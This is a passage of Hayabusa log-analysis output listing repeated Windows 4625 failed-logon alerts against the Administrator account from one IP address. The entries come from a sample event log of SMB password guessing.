NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:54.284 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XxFEw9s0nnEQGzUN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:54.342 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wSswFHFSlqcQd47k : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:54.385 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7icutlVIWSLZJszQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:54.440 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DSwyugYn0n3i5f25 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:54.473 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RmBaLCUcR7TmixTy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:54.524 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1oOBz2NQSCdTwa7V : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:54.582 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: O4tU1LPF5DRW9Vm0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:54.633 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SRsSNqPYruWBzp2n : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:54.684 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3JZhBLzt4af1VtCU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:54.729 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dFLZIKSDBvBaWq59 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:54.774 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: guAG4ZTFMjZAxp1A : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:54.817 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Yd04xsSIdiczICeG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:54.865 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Cx3i1URKPhC6KWI7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:54.914 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Npc6IS27HsWP3JA9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:54.963 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KIBnr0eZ1bHHGokW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:55.013 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6gTTrUVjpPU80LlC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:55.078 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FZlmUbCNAJga24JH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:55.136 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Zf3aSGBMe97VujaH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:55.184 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8bx7ZM77aDG7y6Lh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:55.220 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BnHHAClMwyqA3TTI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:55.260 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 00ibRrYvnFt5w9X0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:55.300 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VglTKbnLVFvHZHzQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:55.358 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3NwX0sDFwHQG7Tkq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:55.413 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3mMx3M1zurKMBzyj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:55.468 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sH7b8P0O0uea3PlN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:55.530 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TJcrTyBPuX0TcvOT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:55.574 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kwuZIQAL3BmJnPsJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:55.620 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lxgAfsnH6YWLRD0a : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:55.680 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ttBOjzmEBjr9W2QW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:55.732 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FPDKGGYkJQeWgtUf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:55.848 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nSoJWqS6YPbpCiBf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:55.887 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Pr2oMzxv7pcDfsgw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:55.940 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jiopmZAMpwg3dEaA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:55.989 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tG1Bxm0lt3vwoO5V : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:56.043 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9Kf5AaQX7KOVAIAN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:56.097 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FW9nBirBTHIXIrfp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:56.148 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: S9qKcDhfcf2kMk00 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:56.184 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9NgStzf2xQ4P7q0d : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:56.225 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: j9mCrjQykX06IcMf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:56.256 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7S0QccvEhetekdDP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:56.298 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: n1OnibuatFHwDeLz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:56.342 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: O8u26bKzFOw12m0T : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:56.380 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WEEtOj6BOkI7MPY1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:56.420 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EiCpuqll36DojD3e : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:56.469 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: p9zjo9ZsSVLZcrsr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:56.530 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KKDD0O5flEsIEDRZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:56.582 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jdPMREVdBEJ50ELC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:56.626 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: p7YwRYYCnsr2v08C : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:56.677 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nWyAzzpmxUm2CXE9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:56.724 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9RNqhxyUBjUIic0n : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:56.774 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1JERyz3mOBZt2jki : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:56.817 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: V0i93RW5AOsIKKMU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:56.875 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: U3XEu06vE68O900O : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:56.925 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0fxeGE2jXOnoJttj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:56.969 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6Wdg3l6IFHTdh09j : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:57.028 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4XLVQRnkUd3bfgvF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:57.080 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rHjqFQwqpCJFI6qP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:57.139 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: L5pEWq2mYsFpFLbb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:57.184 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HSFKJXTC2wlyw0gu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:57.225 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vh5igCJpAA5rmqzV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:57.260 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5NzLlJWkfXDcm64c : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:57.309 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: i9sR1QHgZ4oaa82F : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:57.340 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Pq1GWcKzSHSP28hk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:57.388 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: agCtM0s62zXPop0y : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:57.430 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dVvglj7RtxrBUeXi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:57.482 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pMbS0sIpbFDqJvMW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:57.525 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ldO0cAZ54BRHHDyz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:57.577 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OmJH2QWFPiYarKh5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:57.620 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5fCiyHtI0OTo8pBO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:57.664 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: e3vkVuU43tsYHUSj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:57.714 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3w21sFOu2u7FTDZM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:57.756 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Bk7eaqQNK1CEgqoj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:57.792 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Rv5joLgkm3QUYPyb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:57.841 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4l15usDM7jggwEyw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:57.887 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: p9QpOvgDmiOgzQqb : IP Address: 192.168.198.149 : AuthPackage: 